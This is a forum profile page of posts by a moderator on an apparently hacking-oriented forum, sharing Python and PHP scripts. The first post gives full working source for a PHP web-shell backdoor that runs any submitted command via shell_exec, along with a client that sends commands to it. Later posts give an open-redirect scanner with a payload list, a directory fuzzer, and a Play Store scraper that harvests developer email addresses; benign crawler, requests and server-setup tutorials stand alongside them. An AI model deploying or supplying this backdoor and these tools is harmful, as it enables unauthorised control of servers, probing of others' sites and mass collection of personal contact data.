
venomgrills

Moderator
  • Posts: 8
  • Joined
  • Last visited
  • Days Won: 4

venomgrills last won the day on November 13, 2021

venomgrills had the most liked content!

3 Followers

About venomgrills

Recent Profile Visitors

775 profile views

venomgrills's Achievements

Apprentice (3/14)

  • One Month Later
  • Dedicated
  • First Post
  • Week One Done
  • Conversation Starter

Recent Badges

Reputation: 17

  1. Hey guys! Wassup! Hope you are all doing fine! Venom here again! Today I am going to share the code for a small PHP shell which I developed recently.

     <?php
     $uname = shell_exec("uname -a"); // Getting the current unix name with PHP's shell_exec function
     echo "<div class='uname'><center> $uname </center></div>"; // Printing the uname
     $cwd = getcwd(); // Getting the current working directory with PHP's getcwd function
     echo "<div class='uname'><center>Current working directory: ".$cwd."</center></div>"; // Printing the CWD
     ?>
     <!-- Simple HTML for taking input and showing output -->
     <html>
     <head>
     <title>Venom PHP Backdoor</title>
     <style>
     @import url('https://fonts.googleapis.com/css2?family=Shippori+Antique&family=Ubuntu&display=swap');
     * { margin: 0; padding: 0; }
     body { background-color: black; color: #33FF3E; }
     .uname { font-size: 20px; padding-top: 20px; font-family: 'Shippori Antique', sans-serif; }
     #keyword { margin-top: 20px; font-size: 40px; border: 2px solid green; border-radius: 9px; }
     input { background-color: #272927; text-align: center; margin-bottom: 100px; }
     input::-webkit-input-placeholder { font-size: 20px; text-align: center; padding-bottom: 20px; color: green; }
     .output { color: green; font-family: 'Ubuntu', sans-serif; font-size: 20px; padding-left: 20px; }
     </style>
     </head>
     <body>
     <center>
     <form method="POST">
     <input id="keyword" onfocus="this.value=''; this.style.color='#20ED20'" name="command" placeholder="Enter command here..."/> <!-- Taking the command via POST under the field name "command" -->
     </form>
     </center>
     </body>
     </html>
     <?php
     if ($_SERVER['REQUEST_METHOD'] == "POST") { // If the user submits the form (any POST request)
         $cmd = $_POST['command']; // Read the submitted "command" field
         $output = shell_exec($cmd); // Execute the user input with shell_exec
         $description = preg_replace("/\r\n|\r|\n/", '<br/>', $output); // Replace newline characters with <br/>
         echo "<div class='output'>".$description."</div>"; // Display the output
     }
     ?>

     Hope you have learnt something new from this! Regards, VenomGrills

     Attachment: Developing a custom PHP Backdoor - Backend-Development - Shell_Forum.mp4
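     To see how the form is consumed, here is a minimal Python sketch that posts a command to the shell the same way the HTML form does. The host and the filename shell.php are assumptions for the example, not something from the post itself.

     # Minimal usage sketch (assumes the shell is saved as shell.php on a host you control)
     import requests  # HTTP client used to emulate the HTML form

     url = "http://127.0.0.1/shell.php"        # hypothetical location of the uploaded shell
     data = {"command": "id"}                  # same field name the form uses ("command")
     response = requests.post(url, data=data)  # POST the command, just like the form does
     print(response.text)                      # the command output is embedded in the returned HTML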
  2. Hey guys! Here I am, back again! Today I am going to talk about hosting your site and managing all the backend stuff in this one tutorial. All you need is a VPS (2 GB RAM recommended) with CentOS installed.

     First of all, what does a backend full-stack developer need? It could be LAMP (Linux, Apache, MySQL, PHP) or LNMP (Linux, Nginx, MySQL, PHP). In our case we are going with LAMP and will discuss the complete server configuration one piece at a time. I'll be posting further parts on complete backend management, along with tutorials on PHP and MySQL. So without wasting much time, let's start!

     Many people who use a VPS prefer having a panel because it makes things much easier, while others prefer managing everything over SSH. In our case we will first install a panel over SSH and then discuss configuring the server with both the panel and SSH. There are multiple panels such as cPanel/WHM, aaPanel and CentOS Web Panel. We will go with the free one, aaPanel, which works much like cPanel/WHM; CentOS Web Panel is also free but looks a bit complicated. So we will be installing aaPanel on our VPS.

     To install aaPanel we need an SSH connection to the VPS. To connect over SSH, type:

     ssh root@server_ip

     Then enter your SSH password, and after a successful login type these commands in your terminal:

     yum update
     yum install wget -y
     wget -O install.sh http://www.aapanel.com/script/install_6.0_en.sh
     bash install.sh

     After that, wait for a while. After a few minutes you will get a link to your control panel along with a username and password. Open that link in a browser and boom! You are done! I'll post the next part in this series soon.

     Warm Regards, Venomgrills
  3. Hey guys! I am Venom! 🐍 Today I am going to share a simple Python script for finding open redirects across a given list of sites.

     import requests  # requests library for making GET requests to the websites
     import os        # os library for checking whether the input file exists

     # Payloads for checking open redirection
     openRedirection = ["/http://example.com", "/%5cexample.com", "/%2f%2fexample.com", "/example.com/%2f%2e%2e", "/http:/example.com", "/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com", "/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com", "/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com", "/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com", "/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com", "/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com", "/.example.com", "///\;@example.com", "///example.com/", "///example.com", "///example.com/%2f..", "/////example.com/", "/////example.com"]

     file = input("[+] Enter the file path: ")  # taking the file path as user input
     if os.path.exists(file) is True:  # checking whether the file exists
         print("[+] File Found: True!")
         op = open(file, 'r')   # opening the file in read mode
         read = op.readlines()  # reading the lines into a list, one site per line
         print("[+] Total Sites: " + str(len(read)))  # printing the total number of sites
         for sites in read:                    # looping over the site list
             site = sites.replace("\n", "")    # stripping the newline character
             for payloads in openRedirection:  # looping over the payload list
                 url = site + payloads         # final url = target site + payload
                 try:  # skip the url on any request error
                     response = requests.get(url, allow_redirects=True)  # GET request to the final url, following redirects
                     history = response.history  # response.history lists every redirect hop that was followed
                     if history == []:  # no redirect happened
                         print("[+] " + url + " [Not Vulnerable]")
                     else:  # at least one redirect happened
                         op = open("output.txt", 'a')  # opening an output file in append mode
                         op.write(url + "\n")          # saving the vulnerable url
                         print("[+] " + url + " [Vulnerable]")
                         op.close()                    # closing the file to save the content
                 except:
                     pass
     else:  # file not found
         print("[+] File Not found! Please try again with the correct file path!")

     Thanks for reading the post!
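     To make the detection logic above more concrete, here is a minimal sketch of what response.history holds once a redirect has been followed; the URL is just a placeholder, not one of the payload targets.

     # Sketch: inspecting the redirect chain the script keys off (the URL is a placeholder)
     import requests

     response = requests.get("http://example.com/some-redirecting-path", allow_redirects=True)
     for hop in response.history:               # one Response object per redirect that was followed
         print(hop.status_code, hop.url)        # e.g. 302 plus the URL that issued the redirect
     print(response.status_code, response.url)  # the final destination after all redirects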
  4. Hey guys! I am Venom! I hope you are all fine! Today I am sharing a web crawler script written in Python. So let's begin!

     import requests                   # requests library for fetching the page source
     import re                         # re module for pulling href values out of the HTML
     from urllib.parse import urljoin  # urljoin to resolve relative links against the page url
     from bs4 import BeautifulSoup     # bs4 to parse the HTML

     urls = []          # stores the crawl results
     target_links = []  # stores every unique link found so far
     target = input("[+] Enter the url: ")  # taking the target url as user input

     def extract(tar):  # extract all links from the page at "tar"
         try:  # try/except in case of an HTTP or connection error
             response = requests.get(tar)  # fetching the page that was passed to the function
             soup = BeautifulSoup(response.content, 'html.parser')  # parsing the content
             return re.findall('(?:href=")(.*?)"', str(soup))  # extracting every href value with a regex
         except:
             return []  # on any error, return an empty list so the caller's loop still works

     def crawl(path):  # crawl a page and recurse into every new link found on it
         links = extract(path)  # all links found on the page
         for link in links:
             url = urljoin(path, link)  # if the link is relative, join it with the current page url
             if "#" in url:
                 url = url.split("#")[0]  # drop the fragment part of the url
             if link in url and url not in target_links:  # only follow links we have not visited yet
                 target_links.append(url)  # remember the url so we do not crawl it twice
                 urls.append(target_links)
                 print("[+] " + url)  # printing the url we found
                 crawl(url)  # recursing into the newly found url

     crawl(target)  # start crawling from the target url
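     Since the crawler leans on urljoin to turn relative links into absolute ones, here is a tiny illustrative sketch of how it resolves them; the URLs are placeholders.

     # Sketch: how urljoin resolves the links the crawler finds (URLs are placeholders)
     from urllib.parse import urljoin

     print(urljoin("https://example.com/blog/post.html", "image.png"))  # https://example.com/blog/image.png
     print(urljoin("https://example.com/blog/post.html", "/about"))     # https://example.com/about
     print(urljoin("https://example.com/blog/post.html", "https://other.example/x"))  # absolute links pass through unchanged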
  5. Hey guys! I am Venom! Today I am going to share some basic methods and functions of the requests library! If you want to know more about it, please do comment and let me know! 🙂

     import requests  # importing the library

     url = "https://forum.shellcrew.org"
     headers = {"host": "forum.shellcrew.org", "origin": "shellcrew.org", "referer": "venomgrills.com", "Cookie": "somerandomcookies", "Accept": "application/json", "Content-Type": "application/json"}
     data = {"username": "admin", "password": "admin"}
     auth = ("venom", "fuck0ff")  # basic-auth credentials as a (user, password) tuple

     response = requests.get(url)  # making a GET request (you can use any url, e.g. https://venomgrills.com)
     response = requests.get(url, auth=auth)  # GET request with HTTP basic auth
     response = requests.get(url, headers=headers)  # GET request with custom headers
     response = requests.get(url, headers=headers, allow_redirects=True)  # GET request that follows redirects
     response = requests.post(url, headers=headers, data=data)  # POST request with data and headers
     response = requests.put(url, headers=headers, data=data)  # PUT request with data and headers
     response = requests.get(url, timeout=0.5)  # GET request with a timeout (in seconds)

     statusCode = response.status_code  # status code of the response
     header = response.headers          # headers of the response
     cookies = response.cookies         # cookies of the response
     history = response.history         # redirect history of the response
     encoding = response.encoding       # encoding of the response
     content = response.content         # raw body of the response, including HTML tags, tabs etc.

     # Errors and exceptions in the requests library
     try:
         response = requests.get(url)
     except requests.exceptions.ConnectionError as e:
         print("Connection error")  # the website is down or unreachable

     try:
         response = requests.get(url)
     except requests.exceptions.SSLError as e:
         print("The website has an invalid or expired ssl certificate!")

     try:
         response = requests.get(url)
     except requests.exceptions.InvalidHeader as e:
         print("Invalid header given (*_*)")

     # If you want more detailed info about the requests library, please do comment down for the second part!! :)
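     Since the timeout parameter is shown above, here is a small companion sketch that catches the matching exception; the URL reuses the one from the post and the 3-second value is just an example choice.

     # Sketch: catching the exception raised when a timeout= request takes too long
     import requests

     try:
         response = requests.get("https://forum.shellcrew.org", timeout=3)  # example timeout value
         print(response.status_code)
     except requests.exceptions.Timeout:
         print("The request took longer than 3 seconds and timed out")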
  6. Hello friends! I'm Venom (Gaurav), founder of Venomgrills and a mod at Shell_Crew. Let's look at a cool Python script developed by me; I hope you guys enjoy it and learn from it, so let's go.

     # Importing libraries
     import requests                # requests library for making GET requests to the web pages
     from bs4 import BeautifulSoup  # to parse the HTML and read content from tags and attributes
     import re                      # regex to find email addresses in the parsed data

     emailList = []  # list that collects the emails found on the pages
     x = 0           # integer index into emailList, used to print each unique email once

     # Regular expression for the email format
     emailRegex = r"""(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""

     query = input("Enter your query: ")  # taking any search term as input, like food apps or gaming apps
     url = "https://play.google.com/store/search?q=" + query + "&c=apps"  # Play Store search url for our query

     # Scraping part: grab the app links from the search results page
     response = requests.get(url).content              # GET request for the source code of the search page
     soup = BeautifulSoup(response, 'html.parser')     # parsing the response with the html parser
     for links in soup.findAll("a", class_="JC71ub"):  # grabbing every a tag with the class "JC71ub" (the tag that holds the app links)
         link = links.get("href")                      # grabbing the link from the href attribute
         finalLink = "https://play.google.com" + link  # final link = Play Store base url + app path from the href
         response = requests.get(finalLink).content    # GET request to fetch the app page
         soup = BeautifulSoup(response, 'html.parser') # parsing the app page with the html parser
         for emails in re.finditer(emailRegex, str(soup)):  # finding every email pattern in the page source
             email = emails.group()   # the matched email as a string
             emailList.append(email)  # adding it to emailList
         print(emailList[x])               # printing one email for this app, using x as the index
         output = open("emails.txt", 'a')  # opening emails.txt in append mode
         output.write(emailList[x])        # writing the email to the text file
         output.close()                    # closing the file to save the output
         x += 3  # each email appears three times on a page, so we skip three entries to avoid printing duplicates

     Attachment: playstore_python.mp4
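     The x += 3 indexing above assumes every app page yields exactly three copies of the same address. As an alternative sketch (not from the original post), a set can deduplicate the matches no matter how many times each email appears on the page:

     # Alternative dedup sketch (assumption: each address should be reported once, however often it appears)
     import re

     def unique_emails(page_source, email_regex):
         seen = set()  # addresses that have already been reported
         for match in re.finditer(email_regex, page_source):
             email = match.group()
             if email not in seen:  # only report an address the first time it shows up
                 seen.add(email)
                 print(email)
         return seen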
  7. Hi guys, I'm Venom! Today we will see a short Python 3 script for a web fuzzer. I hope you will learn something new from it. So let's roll.

     # Importing libraries
     import requests  # for making requests to the website
     import os        # for checking that the wordlist path exists

     url = input('Enter the url: ')                 # taking the target url as user input
     wordlist = input('Enter the wordlist path: ')  # taking the wordlist path as user input

     # Checking whether the wordlist exists
     if os.path.exists(wordlist) is False:  # if the wordlist does not exist, say so
         print("Wordlist not found! Please try again!")
     else:  # the wordlist exists, so run the fuzzer
         print("Wordlist Found: True!")
         op = open(wordlist, 'r')  # opening the wordlist file
         read = op.readlines()     # reading every line of the file
         for path in read:         # looping over each line of the wordlist
             path = path.strip()   # stripping the newline so it does not end up in the url
             finalurl = url + "/" + path        # final url = target url + "/" + path
             response = requests.get(finalurl)  # GET request to read the status code
             if response.status_code == 200 or response.status_code == 403:  # keep hits that return 200 or 403
                 print(finalurl + " [" + str(response.status_code) + "]")  # print the final url with its status code
             else:  # ignore everything else
                 pass

     Attachment: fuzzer_2-Veed.mp4
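     One thing the loop above does not handle is a target that drops the connection mid-scan. Here is a small hedged sketch that wraps the request the same way the other scripts in this thread do; the 5-second timeout and the helper name probe are just example choices.

     # Sketch: probing a path without letting a connection error stop the whole scan
     import requests

     def probe(finalurl):
         try:
             response = requests.get(finalurl, timeout=5)  # example timeout value
             return response.status_code                   # status code for the caller to filter on
         except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
             return None                                   # None means the path could not be probed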